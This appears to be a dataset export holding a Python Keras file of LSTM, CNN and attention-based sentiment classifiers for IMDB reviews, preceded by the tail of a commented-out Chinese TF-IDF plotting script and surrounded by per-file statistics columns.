# # plt.figure(figsize=(10,6))
# # plt.title('TF-IDF Ranking')
# # fig = plt.axes()
# # plt.barh(range(len(ss.重要性[:25][::-1])),ss.重要性[:25][::-1])
# # fig.set_yticks(np.arange(len(ss.重要性[:25][::-1])))
# # font = FontProperties(fname=r'c:\windows\fonts\simsun.ttc')
# # fig.set_yticklabels(ss.词语[:25][::-1],fontproperties=font)
# # fig.set_xlabel('Importance')
# # plt.savefig('TF-IDF Ranking.png')
# # plt.show()
# # #print('over')
# #------------------------------------数据可视化------------------------------------
# data_x = np.array(ss.词语) #先将数据框转换为数组
# data_x_list = data_x.tolist() #其次转换为列表
# #print(data_x_list)
# data_y = np.array(ss.重要性) #先将数据框转换为数组
# data_y_list = data_y.tolist() #其次转换为列表
#
# c = Bar()
# # x轴
# c.add_xaxis(data_x_list)
# # y轴
# c.add_yaxis('TF-IDF值',data_y_list)
#
# # reversal_axis方法是反转xy轴
# # c.reversal_axis()
# # False则不显示y轴的值,默认为显示
# c.set_series_opts(label_opts=opts.LabelOpts(is_show=False),
# #markpoint_opts指定类型
# # markpoint_opts=opts.MarkPointOpts(
# # data = [
# # opts.MarkPointItem(type_="max", name="最大值"),
# # opts.MarkPointItem(type_="min", name="最小值"),
# # ]
# # )
# )
# c.set_global_opts(title_opts=opts.TitleOpts(title="微博数据_TF-IDF _Ranking"),xaxis_opts=opts.AxisOpts(name='词语')
# # datazoom_opts水平显示,vertical垂直显示
# # datazoom_opts=opts.DataZoomOpts(orient="vertical")
# )
# #c.render_notebook()
# c.render('微博数据_TF-IDF _Ranking.html')
#
#
#
| 34.5625
| 113
| 0.539964
| 639
| 5,530
| 4.497653
| 0.2723
| 0.017397
| 0.033403
| 0.016701
| 0.84412
| 0.832985
| 0.832985
| 0.815588
| 0.815588
| 0.815588
| 0
| 0.010025
| 0.206329
| 5,530
| 159
| 114
| 34.779874
| 0.644794
| 0.65642
| 0
| 0
| 0
| 0
| 0.078666
| 0.014475
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 0.333333
| 0.051282
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
6f99a272fc597c656b0a28d0413771f92563581d
| 31,049
|
py
|
Python
|
imdb/model.py
|
FrankBlood/TextClassification
|
a2ac14fc4142e5aef2725fc0d4347d476e1c126f
|
[
"Apache-2.0"
] | 1
|
2017-12-15T02:10:06.000Z
|
2017-12-15T02:10:06.000Z
|
imdb/model.py
|
FrankBlood/TextClassification
|
a2ac14fc4142e5aef2725fc0d4347d476e1c126f
|
[
"Apache-2.0"
] | null | null | null |
imdb/model.py
|
FrankBlood/TextClassification
|
a2ac14fc4142e5aef2725fc0d4347d476e1c126f
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf8 -*-
from __future__ import print_function
import numpy as np
from keras.models import Sequential, Model
from keras.layers import Input, Embedding, Dense, LSTM, GRU, Conv1D, GlobalMaxPooling1D, MaxPooling1D, GlobalAveragePooling1D
from keras.layers import TimeDistributed, RepeatVector, Permute, Lambda, Bidirectional, Dropout
from keras.layers.merge import concatenate, add, dot, multiply
from keras.layers.normalization import BatchNormalization
from keras import backend as K
from keras.layers import Activation
from recurrent import ATTENTION_INNER_GRU
from keras.optimizers import RMSprop, Adam, SGD, Adagrad, Adadelta, Adamax, Nadam
from keras.layers.advanced_activations import PReLU
from config import Config
def pre_attention_inner_rnn(config, embedding_matrix=None):
"""Pre Attention INNER RNN
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build Pre Attention INNER RNN...")
if embedding_matrix == None:
# Zero init...
# embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# Random init...
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## Pre Attention -- LSTM
########################################
attention = LSTM(300, dropout=0.2, recurrent_dropout=0.2, name='attention_layer', trainable=False)(embedded_sequences)
attention = Dense(300, activation='relu')(attention)
# rnn_model = Model(inputs=sequence_input, outputs=rnn)
#
# rnn_model.load_weights('./models/pre_model.h5')
#
# attention = rnn_model.predict_on_batch(sequence_input)
########################################
## Attention INNER GRU Model
########################################
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=attention,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.load_weights('./models/pre_model.h5', by_name=True)
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def rnn_cat_rnn(config, embedding_matrix=None):
"""RNN Cat Embedding GRU Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build RNN CAT RNN...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## ATTENTION: RNN Model -- also GRU
########################################
attention = GRU(config.lstm_output_size,
return_sequences=False,
dropout=config.dropout,
recurrent_dropout=config.dropout)(embedded_sequences)
# attention = Dense(300, activation='relu')(attention)
attention = RepeatVector(config.maxlen)(attention)
# x = concatenate([embedded_sequences, attention])
x = multiply([embedded_sequences, attention])
########################################
## Common RNN Model -- GRU
########################################
x = Bidirectional(GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout))(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def rnn_inner_rnn(config, embedding_matrix=None):
"""CNN add Attentive RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build RNN Attentive INNER RNN...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
rnn = GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout)(embedded_sequences)
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=rnn,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def cnn_inner_rnn(config, embedding_matrix=None):
"""CNN Attentive INNER RNN Model
:param config:
:param embedding_matrix:
:return: cnn inner rnn model
"""
print("Build CNN Attentive INNER RNN Model...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1,
filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
x = Bidirectional(ATTENTION_INNER_GRU(config.lstm_output_size,
attention=cnn,
dropout=config.dropout,
recurrent_dropout=config.dropout))(embedded_sequences)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def cnn_add_rnn(config, embedding_matrix=None):
"""CNN add Attentive RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build CNN add Attentive RNN...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
rnn_layer = Bidirectional(LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout, return_sequences=True))
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1, filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
cnn_dense1 = Dense(config.hidden_dims, activation='tanh')
cnn_dense2 = Dense(config.hidden_dims*2, activation='tanh')
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
cnn_t = cnn_dense1(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
x = rnn_layer(x)
cnn_t2 = cnn_dense2(cnn)
a2 = multiply([cnn_t2, x])
a2 = Permute([2, 1])(a2)
a2 = Lambda(lambda x: K.sum(x, axis=1))(a2)
a2 = Activation('softmax')(a2)
x = Permute([2, 1])(x)
x = multiply([a2, x])
x = Permute([2, 1])(x)
x = Lambda(lambda x: K.sum(x, axis=1))(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
# plot_model(model, to_file=config.model_name+'.png')
return model
def complex_cnn_based_rnn(config, embedding_matrix=None):
'''Complex CNN based RNN
:param config:
:param embedding_matrix:
:return:
'''
print("Build Complex CNN based Attentive RNN...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
rnn_layer = Bidirectional(GRU(config.lstm_output_size,
dropout=config.dropout,
recurrent_dropout=config.dropout))
# cnn_layer = Conv1D(filters=config.nb_filter,
# kernel_size=config.filter_length, padding = "valid", activation="relu", strides=1)
#
# conv1 = Conv1D(filters=config.nb_filter,
# kernel_size=1, padding="valid", strides=1, activation='relu')
conv2 = Conv1D(filters=config.nb_filter,
kernel_size=2, padding="valid", strides=1, activation='relu')
conv3 = Conv1D(filters=config.nb_filter,
kernel_size=3, padding="valid", strides=1, activation='relu')
conv4 = Conv1D(filters=config.nb_filter,
kernel_size=4, padding="valid", strides=1, activation='relu')
# conv5 = Conv1D(filters=config.nb_filter,
# kernel_size=5, padding='same', activation='relu')
#
# conv6 = Conv1D(filters=config.nb_filter,
# kernel_size=6, padding='same', activation='relu')
#
# pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
# cnn_dropout1 = Dropout(0.2)
# cnn_dropout2 = Dropout(0.2)
# cnn_batchnormalization = BatchNormalization()
# cnn_repeatvector = RepeatVector(config.embedding_dims)
# cnn_dense1 = Dense(300, activation='relu')
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
# conv1a = conv1(embedded_sequences)
# glob1a = GlobalAveragePooling1D()(conv1a)
# glob1a = Dropout(config.dropout)(glob1a)
# glob1a = BatchNormalization()(glob1a)
conv2a = conv2(embedded_sequences)
glob2a = GlobalAveragePooling1D()(conv2a)
glob2a = Dropout(config.dropout)(glob2a)
glob2a = BatchNormalization()(glob2a)
conv3a = conv3(embedded_sequences)
glob3a = GlobalAveragePooling1D()(conv3a)
glob3a = Dropout(config.dropout)(glob3a)
glob3a = BatchNormalization()(glob3a)
conv4a = conv4(embedded_sequences)
glob4a = GlobalAveragePooling1D()(conv4a)
glob4a = Dropout(config.dropout)(glob4a)
glob4a = BatchNormalization()(glob4a)
# conv5a = conv5(embedded_sequences)
# glob5a = GlobalAveragePooling1D()(conv5a)
# glob5a = Dropout(config.dropout)(glob5a)
# glob5a = BatchNormalization()(glob5a)
#
# conv6a = conv6(embedded_sequences)
# glob6a = GlobalAveragePooling1D()(conv6a)
# glob6a = Dropout(config.dropout)(glob6a)
# glob6a = BatchNormalization()(glob6a)
cnn = concatenate([glob2a, glob3a, glob4a])
# print(np.shape(cnn))
# print(cnn.shape)
cnn_t = cnn_dense(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
x = rnn_layer(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def cnn_based_rnn(config, embedding_matrix=None):
"""CNN based Attentive RNN Model
:param config:
:param embedding_matrix:
:return: The model
"""
print("Build CNN based Attentive RNN...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
########################################
## All Used Layers
########################################
rnn_layer = Bidirectional(GRU(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout))
cnn_layer = Conv1D(activation="relu", padding="valid", strides=1, filters=config.nb_filter, kernel_size=config.filter_length)
pooling_layer = GlobalMaxPooling1D()
cnn_dense = Dense(config.hidden_dims, activation='relu')
cnn_dropout1 = Dropout(config.dropout)
cnn_dropout2 = Dropout(config.dropout)
cnn_batchnormalization = BatchNormalization()
cnn_dense1 = Dense(config.hidden_dims)
########################################
## Input and Embedding
########################################
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
########################################
## Attention Layer: CNN
########################################
cnn = cnn_layer(embedded_sequences)
cnn = pooling_layer(cnn)
cnn = cnn_dropout1(cnn)
cnn = cnn_dense(cnn)
cnn = cnn_dropout2(cnn)
cnn = cnn_batchnormalization(cnn)
########################################
## Attention Action
########################################
cnn_t = cnn_dense1(cnn)
a = multiply([cnn_t, embedded_sequences])
a = Permute([2, 1])(a)
a = Lambda(lambda x: K.sum(x, axis=1))(a)
a = Activation('sigmoid')(a)
embedded_sequences = Permute([2, 1])(embedded_sequences)
x = multiply([a, embedded_sequences])
x = Permute([2, 1])(x)
########################################
## Output Layers
########################################
x = rnn_layer(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
x = BatchNormalization()(x)
preds = Dense(1, activation='sigmoid')(x)
########################################
## train the model
########################################
model = Model(inputs=sequence_input, outputs=preds)
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def bidirectional_lstm(config, embedding_matrix=None):
""" Bidirectional LSTM model
:param config:
:return: the model
"""
print('Build Bidirectional LSTM model...')
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Bidirectional(LSTM(config.lstm_output_size))(embedded_sequences)
x = Dropout(config.dropout)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims, input_length=config.maxlen))
# model.add(Bidirectional(LSTM(config.lstm_output_size)))
# model.add(Dropout(config.dropout))
# model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['acc'])
model.summary()
return model
def cnn_lstm(config, embedding_matrix=None):
"""CNN LSTM model
:param config:
:return: the model
"""
print("Build CNN LSTM model...")
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Dropout(config.dropout)(embedded_sequences)
x = Conv1D(nb_filter=config.nb_filter,
filter_length=config.filter_length,
border_mode='valid',
activation='relu',
subsample_length=1)(x)
x = MaxPooling1D(pool_length=config.pool_length)(x)
x = LSTM(config.lstm_output_size)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims, input_length=config.maxlen))
# model.add(Dropout(config.dropout))
# model.add(Conv1D(nb_filter=config.nb_filter,
# filter_length=config.filter_length,
# border_mode='valid',
# activation='relu',
# subsample_length=1))
# model.add(MaxPooling1D(pool_length=config.pool_length))
# model.add(LSTM(config.lstm_output_size))
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
return model
def cnn(config, embedding_matrix=None):
"""CNN model
:param config:
:return: the model
"""
print('Build CNN model...')
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = Conv1D(nb_filter=config.nb_filter,
filter_length=config.filter_length,
border_mode='valid',
activation='relu',
subsample_length=1)(embedded_sequences)
x = GlobalMaxPooling1D()(x)
x = Dense(config.hidden_dims, activation='relu')(x)
x = Dropout(config.dropout)(x)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
#
# # we start off with an efficient embedding layer which maps
# # our vocab indices into embedding_dims dimensions
# model.add(Embedding(config.max_features,
# config.embedding_dims,
# input_length=config.maxlen,
# dropout=config.dropout))
#
# # we add a Convolution1D, which will learn nb_filter
# # word group filters of size filter_length:
# model.add(Conv1D(nb_filter=config.nb_filter,
# filter_length=config.filter_length,
# border_mode='valid',
# activation='relu',
# subsample_length=1))
# # we use max pooling:
# model.add(GlobalMaxPooling1D())
#
# # We add a vanilla hidden layer:
# model.add(Dense(config.hidden_dims))
# model.add(Dropout(config.dropout))
# model.add(Activation('relu'))
#
# # We project onto a single unit output layer, and squash it with a sigmoid:
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='nadam',
metrics=['accuracy'])
model.summary()
return model
def lstm(config, embedding_matrix=None):
"""LSTM model
:param config:
:return: the model
"""
print('Build LSTM model...')
if embedding_matrix == None:
# # embedding_matrix = np.zeros((config.max_features, config.embedding_dims))
# numpy_rng = np.random.RandomState(4321)
# embedding_matrix = numpy_rng.uniform(low=-0.05, high=0.05, size=(config.max_features, config.embedding_dims))
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
input_length=config.maxlen)
else:
embedding_layer = Embedding(config.max_features,
config.embedding_dims,
weights=[embedding_matrix],
input_length=config.maxlen,
trainable=False)
sequence_input = Input(shape=(config.maxlen,), dtype='int32')
embedded_sequences = embedding_layer(sequence_input)
x = LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout)(embedded_sequences)
preds = Dense(1, activation='sigmoid')(x)
model = Model(inputs=sequence_input, outputs=preds)
# model = Sequential()
# model.add(Embedding(config.max_features, config.embedding_dims))
# model.add(LSTM(config.lstm_output_size, dropout=config.dropout, recurrent_dropout=config.dropout)) # try using a GRU instead, for fun
# model.add(Dense(1))
# model.add(Activation('sigmoid'))
print('Sucessfully built...')
# try using different optimizers and different optimizer configs
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
return model
if __name__ == '__main__':
config = Config(max_feature=102153, maxlen=2570,
batch_size=50, embedding_dims=300, nb_filter=128,
filter_length=3, hidden_dims=300, nb_epoch=20, dropout=0.5,
pool_length=4, lstm_output_size=300, model_name='model',
embedding_file=None)
# model = bidirectional_lstm(config)
# model = cnn(config)
# model = cnn_lstm(config)
# model = lstm(config)
# model = cnn_based_rnn(config)
# model = cnn_add_rnn(config)
# model = complex_cnn_based_rnn(config)
# model = cnn_inner_rnn(config)
# model = rnn_inner_rnn(config)
# model = rnn_cat_rnn(config)
model = pre_attention_inner_rnn(config)
| 38.42698
| 141
| 0.583594
| 3,166
| 31,049
| 5.532217
| 0.072331
| 0.053097
| 0.053154
| 0.063032
| 0.81376
| 0.796118
| 0.767171
| 0.731373
| 0.718413
| 0.701684
| 0
| 0.016203
| 0.266514
| 31,049
| 808
| 142
| 38.42698
| 0.752876
| 0.248671
| 0
| 0.761905
| 0
| 0
| 0.046022
| 0.000978
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02619
| false
| 0
| 0.030952
| 0
| 0.083333
| 0.030952
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.